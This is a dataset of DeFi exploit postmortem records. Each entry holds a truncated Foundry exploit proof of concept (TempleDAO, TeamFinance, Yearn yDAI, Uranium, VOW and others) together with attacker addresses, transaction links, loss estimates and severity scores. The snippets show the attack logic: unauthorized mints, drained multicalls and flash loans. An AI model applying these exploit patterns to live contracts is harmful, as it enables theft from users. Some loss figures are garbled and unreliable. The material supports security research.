// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : $~2.3M // Attacker : 0x9c9fb3100a2a521985f0c47de3b4598dafd25b01 // Attack Contract : https://etherscan.io/address/0x2df9c154fe24d081cfe568645fb4075d725431e0 // Vulnerabl...
exploit_poc
Templedao
2022-10
Templedao_exp.sol
access_control
3a459dd07a7fd356
2026-01-07T10:59:16.517148
postmortems
ethereum
15,725,066
$~2.3M
2,300,000
null
https://etherscan.io/address/0x2df9c154fe24d081cfe568645fb4075d725431e0
https://etherscan.io/address/0xd2869042e12a3506100af1d192b5b04d65137941
https://etherscan.io/tx/0x8c3f442fc6d640a6ff3ea0b12be64f1d4609ea94edd2966f42c01cd9bdcf04b5
null
null
true
true
true
critical
$~2.3M
access-control
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker xFraxTempleLP balance before exploit", xFraxTempleLP.balanceOf(address(this)), 18 ); uint256 lpbalance = xFraxTempleLP.balanceOf(address(StaxLPStaking)); // Perform migrateStake() StaxLPS...
true
$~2.3M
https://etherscan.io/address/0x2df9c154fe24d081cfe568645fb4075d725431e0
https://etherscan.io/address/0xd2869042e12a3506100af1d192b5b04d65137941
https://etherscan.io/tx/0x8c3f442fc6d640a6ff3ea0b12be64f1d4609ea94edd2966f42c01cd9bdcf04b5
$2.30M
8.2
high
Templedao Exploit (2022-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Address https://polygonscan.com/address/0x940ce652a51ebadb5df09d605dbeda95fdcf697b interface Target { struct Call { address target; bytes callData; uint256 value; ...
exploit_poc
MulticallWithoutCheck
2022-10
MulticallWithoutCheck_exp.sol
null
24d903404b898fcd
2026-01-07T10:59:16.517192
postmortems
polygon
34,743,770
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { uint256 USDTBlance = USDT.balanceOf(address(target)); bytes memory data = abi.encodeWithSignature("transfer(address,uint256)", address(this), USDTBlance); Target.Call memory inputData = Target.Call({target: address(USDT), callData: data, value: 0}); Target...
true
Unknown
2.71
low
MulticallWithoutCheck Exploit (2022-10)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~2,5K USDC // Attacker : 0xcc1A341D0F2a06Eaba436935399793F05C2bbE92 // Attack Contract : https://etherscan.io/address/0xFD4DcCD754EAaA8C9196998c5Bb06A56dF6a1D95 // Vulne...
exploit_poc
Uerii
2022-10
Uerii_exp.sol
access_control
fc2b2832931f23d1
2026-01-07T10:59:16.517236
postmortems
ethereum
15,767,837
~2,5K USDC
2
null
https://etherscan.io/address/0xFD4DcCD754EAaA8C9196998c5Bb06A56dF6a1D95
https://etherscan.io/address/0x418c24191ae947a78c99fdc0e45a1f96afb254be
https://etherscan.io/tx/0xf4a3d0e01bbca6c114954d4a49503fc94dfdbc864bded5530b51a207640d86b5
null
null
true
true
true
low
~2,5K USDC
access-control
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker WETH balance before exploit", WETH_TOKEN.balanceOf(address(this)), 18 ); // Actual payload exploiting the missing access control UERII_TOKEN.mint(); // Exchanging the newly minted UERII f...
true
~2,5K USDC
https://etherscan.io/address/0xFD4DcCD754EAaA8C9196998c5Bb06A56dF6a1D95
https://etherscan.io/address/0x418c24191ae947a78c99fdc0e45a1f96afb254be
https://etherscan.io/tx/0xf4a3d0e01bbca6c114954d4a49503fc94dfdbc864bded5530b51a207640d86b5
$2
8.85
high
Uerii Exploit (2022-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity 0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Analysis // https://twitter.com/BlockSecTeam/status/1584959295829180416 // https://twitter.com/AnciliaInc/status/1584955717877784576 // TX // https://etherscan.io/tx/0x8037b3dc0bf9d5d396c1050682...
exploit_poc
N00d
2022-10
N00d_exp.sol
null
1cc00da76422804e
2026-01-07T10:59:16.517285
postmortems
ethereum
15,826,379
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { registry.setInterfaceImplementer( address(this), bytes32(0x29ddb589b1fb5fc7cf394961c1adf5f8c6454761adf795e67fe149f658abe895), address(this) ); n00d.approve(address(Bar), type(uint256).max); // The swap is performed 4 times. int256 j; ...
true
Unknown
3.63
low
N00d Exploit (2022-10)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~200,000 US$ // Attacker : 0xb687550842a24d7fbc6aad238fd7e0687ed59d55 // Attack Contract : 0x9682f31b3f572988f93c2b8382586ca26a866475 // Vulnerable Contract : 0x6eb211ca...
exploit_poc
RabbyWallet_SwapRouter
2022-10
RabbyWallet_SwapRouter_exp.sol
null
794442cc5b315685
2026-01-07T10:59:16.517348
postmortems
unknown
15,724,451
~200,000 US$
200
null
null
null
null
null
null
true
true
false
low
~200,000 US$
unknown
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker USDC balance before exploit", USDC_TOKEN.balanceOf(address(this)), 6 ); // Somehow attacker got these EOA addresses that approved the Rabby Wallet Swap Router contract. // ...Maybe the attacker gr...
true
~200,000 US$
$200
7
medium
RabbyWallet_SwapRouter Exploit (2022-10)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~750 ETH // Attacker : 0xdf31F4C8dC9548eb4c416Af26dC396A25FDE4D5F // Attack Contracts : // - https://etherscan.io/address/0x140cca423081ed0366765f18fc9f5ed299699388 // ...
exploit_poc
EFLeverVault
2022-10
EFLeverVault_exp.sol
flash_loan
4f778930b29683db
2026-01-07T10:59:16.517409
postmortems
ethereum
15,746,199
~750 ETH
750
null
null
https://etherscan.io/address/0xe39fd820b58f83205db1d9225f28105971c3d309
null
null
null
true
true
true
low
~750 ETH
flash-loan
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker WETH balance before exploit", WETH_TOKEN.balanceOf(address(this)), 18 ); uint256 ethBalanceBefore = address(this).balance; // Deposit 0.1 ETH into the EFLever Vault EFLEVER_VAULT.deposit{v...
true
~750 ETH
https://etherscan.io/address/0xe39fd820b58f83205db1d9225f28105971c3d309
$750
8.08
high
EFLeverVault Exploit (2022-10)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : 100,000,000,000,000 RNBW // Attacker : 0x0f44f3489D17e42ab13A6beb76E57813081fc1E2 // Attack Contract : 0xE167cdAAc8718b90c03Cf2CB75DC976E24EE86D3 // Vulnerable Contract ...
exploit_poc
XaveFinance
2022-10
XaveFinance_exp.sol
null
c6162caebbbe41a7
2026-01-07T10:59:16.517477
postmortems
ethereum
15,704,736
100,000,000,000,000 RNBW
100
null
null
https://etherscan.io/address/0x8f9036732b9aa9b82D8F35e54B71faeb2f573E2F
https://etherscan.io/tx/0xc18ec2eb7d41638d9982281e766945d0428aaeda6211b4ccb6626ea7cff31f4a
null
null
true
true
false
low
100,000,000,000,000 RNBW
unknown
function testAttack() public { // tx to mint 100,000,000,000,000 RNBW tokens bytes32 tx0 = DAO_MODULE.getTransactionHash( address(RNBW_TOKEN), 0, encodeWithSignature_mint(ATTACKER_EOA, 100_000_000_000_000_000_000_000_000_000_000), //hex"40c10f1900000000000...
true
100,000,000,000,000 RNBW
https://etherscan.io/address/0x8f9036732b9aa9b82D8F35e54B71faeb2f573E2F
https://etherscan.io/tx/0xc18ec2eb7d41638d9982281e766945d0428aaeda6211b4ccb6626ea7cff31f4a
$100
9
high
XaveFinance Exploit (2022-10)
true
true
true
false
//SPDX-License-Identifier: MIT pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~115 BNB // Attacker : 0xaB74FBd735Cd2ED826b64e0F850a890930A91094 // Attack Contracts : // - https://www.bscscan.com/address/0xe3eA6e35A6F88DB9d342352B056139803A94b586 // - ht...
exploit_poc
HPAY
2022-10
HPAY_exp.sol
null
d71de3729f259359
2026-01-07T10:59:16.517551
postmortems
bsc
22,280,853
~115 BNB
115,000,000,000
null
null
https://www.bscscan.com/address/0xe9bc03ef08e991a99f1bd095a8590499931dcc30
null
null
null
true
true
false
critical
~115 BNB
unknown
false
~115 BNB
https://www.bscscan.com/address/0xe9bc03ef08e991a99f1bd095a8590499931dcc30
$115000.00M
5.78
medium
HPAY Exploit (2022-10)
true
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~12 WBNB // Attacker : 0xde01f6Ce91E4F4bdB94BB934d30647d72182320F // Attack Contract : 0x08a525104Ea2A92aBbcE8e4e61C667eED56f3B42 // Vulnerable Contract : 0xc342774492b5...
exploit_poc
BEGO
2022-10
BEGO_exp.sol
null
f9e3d2bc09c65b24
2026-01-07T10:59:16.517608
postmortems
bsc
22,315,679
~12 WBNB
12
null
null
null
https://bscscan.com/tx/0x9f4ef3cc55b016ea6b867807a09f80d1b2e36f6cd6fccfaf0182f46060332c57
null
null
true
true
false
low
~12 WBNB
unknown
function testExploit() public { emit log_named_decimal_uint( "[Start] Attacker WBNB balance before exploit", WBNB_TOKEN.balanceOf(address(this)), 18 ); bytes32[] memory _r = new bytes32[](0); bytes32[] memory _s = new bytes32[](0); uint8[] memory _v = new uint8[](0);...
true
~12 WBNB
https://bscscan.com/tx/0x9f4ef3cc55b016ea6b867807a09f80d1b2e36f6cd6fccfaf0182f46060332c57
$12
6.41
medium
BEGO Exploit (2022-10)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : Multiple Tokens ~$15.8M US$ // Root Cause : Lack of check function parameter legitimate // Attacker : 0x161cebb807ac181d5303a4ccec2fc580cc5899fd // Attack Contract :...
exploit_poc
TeamFinance
2022-10
TeamFinance_exp.sol
null
2a0212482846be40
2026-01-07T10:59:16.517679
postmortems
ethereum
15,837,893
Multiple Tokens ~$15.8M US$
15,800,000
null
null
https://etherscan.io/address/0x48d118c9185e4dbafe7f3813f8f29ec8a6248359#code#L1535
https://etherscan.io/tx/0xb2e3ea72d353da43a2ac9a8f1670fd16463ab370e563b9b5b26119b2601277ce
null
null
true
true
false
critical
Multiple Tokens ~$15.8M US$
unknown
function testExploit() public { IV3Migrator.MigrateParams memory parms; uint256 _liquidityToMigrate; emit log_named_decimal_uint("[Before] Attack Contract ETH balance", address(this).balance, 18); emit log_named_decimal_uint("[Before] Attack Contract DAI balance", IERC20(dai).balanceOf(...
true
Multiple Tokens ~$15.8M US$
https://etherscan.io/address/0x48d118c9185e4dbafe7f3813f8f29ec8a6248359#code#L1535
https://etherscan.io/tx/0xb2e3ea72d353da43a2ac9a8f1670fd16463ab370e563b9b5b26119b2601277ce
$15.80M
9
high
TeamFinance Exploit (2022-10)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo -- Total Lost : ~25k USD // TX : https://bscscan.com/tx/0xb1ad1188d620746e2e64785307a7aacf2e8dbda4a33061a4f2fbc9721048e012 // GUY : https://x.com/EXVULSEC/status/1820676684410147276 // R...
exploit_poc
NovaXM2E
2024-08
NovaXM2E_exp.sol
null
547f0816aa7b3a86
2026-01-07T10:59:16.517765
postmortems
bsc
41,116,210
~25k USD
25,000
null
null
null
null
null
null
true
false
false
medium
~25k USD
unknown
function testExploit() public { emit log_named_decimal_uint("[End] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 18); swapamount = 500_000 ether; Pair.swap(swapamount, 0, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attacker USDT balance after ...
true
$25.0K
4.53
low
NovaXM2E Exploit (2024-08)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // TX : https://etherscan.io/tx/0xfe8bc757d87e97a5471378c90d390df47e1b29bb9fca918b94acd8ecfaadc598 // Profit : ~ 21000 USD // REASON : Price Out Of Date contract ContractTest is Test { address ...
exploit_poc
Zenterest
2024-08
Zenterest_exp.sol
null
805b8a779a6f1692
2026-01-07T10:59:16.517812
postmortems
ethereum
20,541,640
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.04
low
Zenterest Exploit (2024-08)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // TX : https://app.blocksec.com/explorer/tx/bsc/0x12f27e81e54684146ec50973ea94881c535887c2e2f30911b3402a55d67d121d // GUY : https://x.com/AnciliaInc/status/1822870201698050064 // Profit : ~ 338 WBN...
exploit_poc
IvestDao
2024-08
IvestDao_exp.sol
null
bacc39cfc7509aea
2026-01-07T10:59:16.517856
postmortems
unknown
41,289,497
null
null
null
null
null
null
null
null
false
false
false
medium
null
unknown
false
Unknown
1.36
low
IvestDao Exploit (2024-08)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; import "forge-std/Test.sol"; // @KeyInfo - Total Lost : ~ 1M USD // Attacker : https://etherscan.io/address/0x48de6bf9e301946b0a32b053804c61dc5f00c0c3 // Attack Contract : https://etherscan.io/address/...
exploit_poc
VOW
2024-08
VOW_exp.sol
null
facd208e634cde25
2026-01-07T10:59:16.517913
postmortems
ethereum
null
~ 1M USD
1,000,000
https://etherscan.io/address/0x48de6bf9e301946b0a32b053804c61dc5f00c0c3
https://etherscan.io/address/0xb7f221e373e3f44409f91c233477ec2859261758
https://etherscan.io/address/0x1bbf25e71ec48b84d773809b4ba55b6f4be946fb
https://etherscan.io/tx/0x758efef41e60c0f218682e2fa027c54d8b67029d193dd7277d6a881a24b9a561
null
null
true
true
false
critical
~ 1M USD
unknown
function testExploit() public balanceLog { //implement exploit code here emit log_named_decimal_uint( "Before exploit VOW balance of attacker:", IERC20(vow).balanceOf(attacker), IERC20(vow).decimals() ); emit log_named_decimal_uint( "Before exploit USDT balance of...
true
~ 1M USD
https://etherscan.io/address/0x48de6bf9e301946b0a32b053804c61dc5f00c0c3
https://etherscan.io/address/0xb7f221e373e3f44409f91c233477ec2859261758
https://etherscan.io/address/0x1bbf25e71ec48b84d773809b4ba55b6f4be946fb
https://etherscan.io/tx/0x758efef41e60c0f218682e2fa027c54d8b67029d193dd7277d6a881a24b9a561
$1.00M
8.79
high
VOW Exploit (2024-08)
true
true
true
false
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 10k // Attacker : https://bscscan.com/address/0x847705eeb01b4f2ae9a92be12615c1052f52e7ad // Attack Contract : https://bscscan.com/address/0xa2d1e47e1a154dd51f2eae0413100c4f8abe13c7, https://bscscan.com/address/...
exploit_poc
unverified_667d
2024-08
unverified_667d_exp.sol
null
2a76d48138185bfd
2026-01-07T10:59:16.517970
postmortems
bsc
41,770,501
10k
10,000
https://bscscan.com/address/0x847705eeb01b4f2ae9a92be12615c1052f52e7ad
https://bscscan.com/address/0xa2d1e47e1a154dd51f2eae0413100c4f8abe13c7,
https://bscscan.com/address/0x8de7eaba58efb23b6f323984377af582b23134e9
https://bscscan.com/tx/0x56d3ed5f635b009e19d693e432479323b23b3eb368cf04e161adbc672a15898e
https://x.com/TenArmorAlert/status/1828983569278231038
https://x.com/TenArmorAlert/status/1828983569278231038
true
true
false
medium
10k
unknown
function testPoC() public { vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); vm.stopPrank(); emit log_named_decimal_uint("after attack: balance of address(attC)", IERC20(dai).balanceOf(address(attacker)), 18); } } // 0xA2d1e47e1A154dD51f2eae0413100c4F8ABE13C7 con...
true
10k
https://bscscan.com/address/0x847705eeb01b4f2ae9a92be12615c1052f52e7ad
https://bscscan.com/address/0xa2d1e47e1a154dd51f2eae0413100c4f8abe13c7,
https://bscscan.com/address/0x8de7eaba58efb23b6f323984377af582b23134e9
https://bscscan.com/tx/0x56d3ed5f635b009e19d693e432479323b23b3eb368cf04e161adbc672a15898e
https://x.com/TenArmorAlert/status/1828983569278231038
https://x.com/TenArmorAlert/status/1828983569278231038
$10.0K
7.21
medium
unverified_667d Exploit (2024-08)
true
true
true
true
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 280BNB // Attacker : https://bscscan.com/address/0x0cc28b80d21ebe7b3f3320faa059f163e98a55a2 // Attack Contract : https://bscscan.com/address/0xac4fde96cf96c5f776de7ec5528cde60f6e8dbea, https://bscscan.com/addre...
exploit_poc
COCO
2024-08
COCO_exp.sol
null
1c4a87519fb28ebb
2026-01-07T10:59:16.518015
postmortems
bsc
41,529,776
280BNB
280,000,000,000
https://bscscan.com/address/0x0cc28b80d21ebe7b3f3320faa059f163e98a55a2
https://bscscan.com/address/0xac4fde96cf96c5f776de7ec5528cde60f6e8dbea,
null
https://app.blocksec.com/explorer/tx/bsc/0x7b743f0fa0ffc6542bc4132405f6c986a00187b6a8b23613ab98c8bcfe9fd875
https://x.com/TenArmorAlert/status/1826101724278579639
https://x.com/TenArmorAlert/status/1826101724278579639
true
true
false
critical
280BNB
unknown
function testPoC() public { vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); vm.stopPrank(); vm.startPrank(addr); IERC20(bsc_usd).approve(address(attC), type(uint256).max); vm.stopPrank(); vm.startPrank(attacker, attacker); attC.attac...
true
280BNB
https://bscscan.com/address/0x0cc28b80d21ebe7b3f3320faa059f163e98a55a2
https://bscscan.com/address/0xac4fde96cf96c5f776de7ec5528cde60f6e8dbea,
https://app.blocksec.com/explorer/tx/bsc/0x7b743f0fa0ffc6542bc4132405f6c986a00187b6a8b23613ab98c8bcfe9fd875
https://x.com/TenArmorAlert/status/1826101724278579639
https://x.com/TenArmorAlert/status/1826101724278579639
$280000.00M
5.98
medium
COCO Exploit (2024-08)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~200k USD // TX : https://etherscan.io/tx/0x636be30e58acce0629b2bf975b5c3133840cd7d41ffc3b903720c528f01c65d9 // Original Attacker: https://etherscan.io/address/0x03560a...
exploit_poc
Convergence
2024-08
Convergence_exp.sol
null
84f9e38f155f6823
2026-01-07T10:59:16.518059
postmortems
ethereum
20,434,450
~200k USD
200,000
https://etherscan.io/address/0x03560a9d7a2c391fb1a087c33650037ae30de3aa
https://etherscan.io/address/0xee45384d4861b6fb422dfa03fbdcc6e29d7beb69
null
null
null
null
true
false
false
high
~200k USD
unknown
false
https://etherscan.io/address/0x03560a9d7a2c391fb1a087c33650037ae30de3aa
https://etherscan.io/address/0xee45384d4861b6fb422dfa03fbdcc6e29d7beb69
$200.0K
3.35
low
Convergence Exploit (2024-08)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.13; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 4.37 ETH (~11527 USD) // Attacker : https://etherscan.io/address/0x40d115198d71cab59668b51dd112a07d273d5831 // Attack Contract : https://etherscan.io/address/0xfaddf57d079...
exploit_poc
OMPxContract
2024-08
OMPxContract_exp.sol
flash_loan
176abc3185d95a11
2026-01-07T10:59:16.518102
postmortems
ethereum
20,468,780
4.37 ETH (~11527 USD)
4.37
https://etherscan.io/address/0x40d115198d71cab59668b51dd112a07d273d5831
https://etherscan.io/address/0xfaddf57d079b01e53d1fe3476cc83e9bcc705854
https://etherscan.io/address/0x09a80172ed7335660327cd664876b5df6fe06108
https://app.blocksec.com/explorer/tx/eth/0xd927843e30c6b2bf43103d83bca6abead648eac3cad0d05b1b0eb84cd87de9b6?line=0
null
null
true
true
true
low
4.37 ETH (~11527 USD)
flash-loan
function testExploit() public { vm.startPrank(attacker); emit log_named_decimal_uint("[Start] Attacker ETH balance before exploit", attacker.balance, 18); AttackerC attackerC = new AttackerC(); attackerC.attack(); emit log_named_decimal_uint("[End] Attacker ETH balance after e...
true
4.37 ETH (~11527 USD)
https://etherscan.io/address/0x40d115198d71cab59668b51dd112a07d273d5831
https://etherscan.io/address/0xfaddf57d079b01e53d1fe3476cc83e9bcc705854
https://etherscan.io/address/0x09a80172ed7335660327cd664876b5df6fe06108
https://app.blocksec.com/explorer/tx/eth/0xd927843e30c6b2bf43103d83bca6abead648eac3cad0d05b1b0eb84cd87de9b6?line=0
$4
8.93
high
OMPxContract Exploit (2024-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.15; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : ~5k // Attacker : https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf // Attack Contract : https://etherscan.io/address/0x802cfff8d7cb27879e00496843bb6936...
exploit_poc
YodlRouter
2024-08
YodlRouter_exp.sol
null
d0b1c0c8cce0b62d
2026-01-07T10:59:16.518155
postmortems
ethereum
null
~5k
5,000
https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf
https://etherscan.io/address/0x802cfff8d7cb27879e00496843bb69361ff09ab3
https://etherscan.io/address/0xe3a0bc3483ae5a04db7ef2954315133a6f7d228e
https://etherscan.io/tx/0x54f659773dae6e01f83184d4b6d717c7f1bb71c0aa59e8c8f4a57c25271424b3
null
null
true
true
false
low
~5k
unknown
function testExploit() public balanceLog { //implement exploit code here uint256 amount; uint256 feeBps = 10_000; address token = USDC; address from; address to = address(this); // Victim 0 from = 0x5322BFF39339eDa261Bf878Fa7d92791Cc969Bb0; amount...
true
~5k
https://etherscan.io/address/0xedee6379fe90bd9b85d8d0b767d4a6deb0dc9dcf
https://etherscan.io/address/0x802cfff8d7cb27879e00496843bb69361ff09ab3
https://etherscan.io/address/0xe3a0bc3483ae5a04db7ef2954315133a6f7d228e
https://etherscan.io/tx/0x54f659773dae6e01f83184d4b6d717c7f1bb71c0aa59e8c8f4a57c25271424b3
$5.0K
7.17
medium
YodlRouter Exploit (2024-08)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED // !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !! pragma solidity >=0.7.0 <0.9.0; import "forge-std/Test.sol"; import "./../interface.sol"; //Converted to foundry test from this file https://gist.github.com/xu3kev/cb1992269c429647d24b6759aff6261c // @K...
exploit_poc
Yearn_ydai
2021-02
Yearn_ydai_exp.sol
null
98b018b00ffadc41
2026-01-07T10:59:16.518210
postmortems
ethereum
11,792,183
~11M US$
11,000,000
null
null
null
https://etherscan.io/tx/0x59faab5a1911618064f1ffa1e4649d85c99cfd9f0d64dcebbc1af7d7630da98b
https://github.com/yearn/yearn-security/blob/master/disclosures/2021-02-04.md
null
true
true
false
critical
~11M US$
unknown
function testAttack() public { // Construct the exploit logic here uint256 hacker_dai_amt_before = dai.balanceOf(address(this)); uint256 hacker_usdc_amt_before = usdc.balanceOf(address(this)); require(usdt.balanceOf(address(this)) == 0, "has usdt"); require(crv3.balanceOf(addres...
true
~11M US$
https://etherscan.io/tx/0x59faab5a1911618064f1ffa1e4649d85c99cfd9f0d64dcebbc1af7d7630da98b
https://github.com/yearn/yearn-security/blob/master/disclosures/2021-02-04.md
$11.00M
7.84
medium
Yearn_ydai Exploit (2021-02)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import {IERC20, IPriceFeed, IPancakeRouter, IUnitroller, IVyper} from "../interface.sol"; /* @KeyInfo -- Total Lost : 1,048 ETH + 400,000 DAI (~3,000,000 US$) Attacker Wallet : https://bscscan.com/address/0xA6AF2872176320...
exploit_poc
FortressLoans
2022-05
FortressLoans_exp.sol
oracle_manipulation
fc80dada6d0a56b0
2026-01-07T10:59:16.518379
postmortems
bsc
17,490,837
1,048 ETH + 400,000 DAI (~3,000,000 US$)
1
null
null
null
null
null
null
true
false
true
low
1,048 ETH + 400,000 DAI (~3,000,000 US$)
oracle-manipulation
function testExploit() public { // txId : 0x18dc1cafb1ca20989168f6b8a087f3cfe3356d9a1edd8f9d34b3809985203501 // Do : Attacker Create [ProposalCreater] Contract vm.rollFork(17_490_837); // make sure start from block 17490837 vm.startPrank(attacker); // Set msg.sender = attacker Pr...
true
$1
7
medium
FortressLoans Exploit (2022-05)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; /* Exploited tx: https://etherscan.io/tx/0xeb8c3bebed11e2e4fcd30cbfc2fb3c55c4ca166003c7f7d319e78eaab9747098 Debug: https://dashboard.tenderly.co/tx/mainnet/0xeb8c3bebed11e2e4fcd30cbfc2fb3c55c4ca1...
exploit_poc
Bayc_apecoin
2022-05
Bayc_apecoin_exp.sol
flash_loan
23c2dff00e248a8f
2026-01-07T10:59:16.518538
postmortems
ethereum
14,403,948
null
null
null
null
null
null
null
null
false
false
true
medium
null
flash-loan
function test() public { cheats.startPrank(0x6703741e913a30D6604481472b6d81F3da45e6E8); bayc.transferFrom(0x6703741e913a30D6604481472b6d81F3da45e6E8, address(this), 1060); emit log_named_decimal_uint("Before exploiting, Attacker balance of APE is", ape.balanceOf(address(this)), 18); NFTX...
true
Unknown
4.41
low
Bayc_apecoin Exploit (2022-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // Exploit Alert ref: https://www.panewslab.com/zh_hk/articledetails/f40t9xb4.html // Origin Attack Transaction: 0xc346adf14e5082e6df5aeae650f3d7f606d7e08247c2b856510766b4dfcdc57f // Blocksec Txin...
exploit_poc
Novo
2022-05
Novo_exp.sol
null
06901226b120dfe6
2026-01-07T10:59:16.518610
postmortems
bsc
18,225,002
null
null
null
null
https://bscscan.com/address/0xa0787daad6062349f63b7c228cbfd5d8a3db08f1#code
null
null
null
false
false
false
medium
null
unknown
function testExploit() public { wbnb.deposit{value: 10 * 1e18}(); emit log_named_decimal_uint("[Start] Attacker WBNB balance before exploit", wbnb.balanceOf(address(this)), 18); // Brrow 17.2 WBNB bytes memory data = abi.encode(0xEeBc161437FA948AAb99383142564160c92D2974, 172 * 1e17); ...
true
https://bscscan.com/address/0xa0787daad6062349f63b7c228cbfd5d8a3db08f1#code
Unknown
6.13
medium
Novo Exploit (2022-05)
false
true
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @Analysis // https://twitter.com/BlockSecTeam/status/1529084919976034304 // @Contract address // https://bscscan.com/address/0x94e06c77b02ade8341489ab9a23451f68c13ec1c#code contract ContractTe...
exploit_poc
HackDao
2022-05
HackDao_exp.sol
flash_loan
f92fbf10278d16dc
2026-01-07T10:59:16.518664
postmortems
bsc
18,073,756
null
null
null
null
null
null
null
null
false
true
true
medium
null
flash-loan
function testExploit() public { WBNB.approve(address(Router), type(uint256).max); HackDao.approve(address(Router), type(uint256).max); DVM(dodo).flashLoan(1900 * 1e18, 0, address(this), new bytes(1)); emit log_named_decimal_uint("[End] Attacker WBNB balance after exploit", WBNB.balanceO...
true
Unknown
4.24
low
HackDao Exploit (2022-05)
false
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : $50 M // Attacker : 0xd9936EA91a461aA4B727a7e0xc47bdd0a852a88a019385ea3ff57cf8de79f019d3661bcD6cD257481c // AttackContract : 0x2b528a28451e9853f51616f3b0f6d82af8bea6ae /...
exploit_poc
Uranium
2021-04
Uranium_exp.sol
null
d3c7d96485eafc8a
2026-01-07T10:59:16.518721
postmortems
bsc
6,920,000
$50 M
50,000,000
null
null
null
null
null
null
true
false
false
critical
$50 M
unknown
function testExploit() public { wrap(); takeFunds(wbnb, busd, 1 ether); takeFunds(busd, wbnb, 1 ether); console.log("BUSD STOLEN : ", IERC20(busd).balanceOf(address(this))); console.log("WBNB STOLEN : ", IERC20(wbnb).balanceOf(address(this))); }
true
$50 M
$50.00M
5.38
medium
Uranium Exploit (2021-04)
true
false
false
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.0; import "../basetest.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 37.5 WBNB // Attacker : 0x476954c752a6ee04b68382c97f7560040eda7309 // Attack Contract : 0x798465b25b68206370d99f541e11eea43288d297 // Vulnerable Contract : 0x8087720eeea59f9f04...
exploit_poc
WXC_Token
2025-08
WXC_Token_exp.sol
flash_loan
98d42e0e05f702f3
2026-01-07T10:59:16.518769
postmortems
bsc
null
37.5 WBNB
37.5
null
null
null
https://bscscan.com/tx/0x1397bc7f0d284f8e2e30d0a9edd0db1f3eb0dd284c75e30d226b02bf09ad068f
https://x.com/TenArmorAlert/status/1954774967481962832
https://x.com/TenArmorAlert/status/1954774967481962832
true
true
true
low
37.5 WBNB
flash-loan
function testExploit() public balanceLog { //implement exploit code here WXC.approve(address(Router), type(uint256).max); WBNB.allowance(address(this), address(ercproxy)); WBNB.approve(address(ercproxy), type(uint256).max); ercproxy.flashLoan(address(WBNB), flash...
true
37.5 WBNB
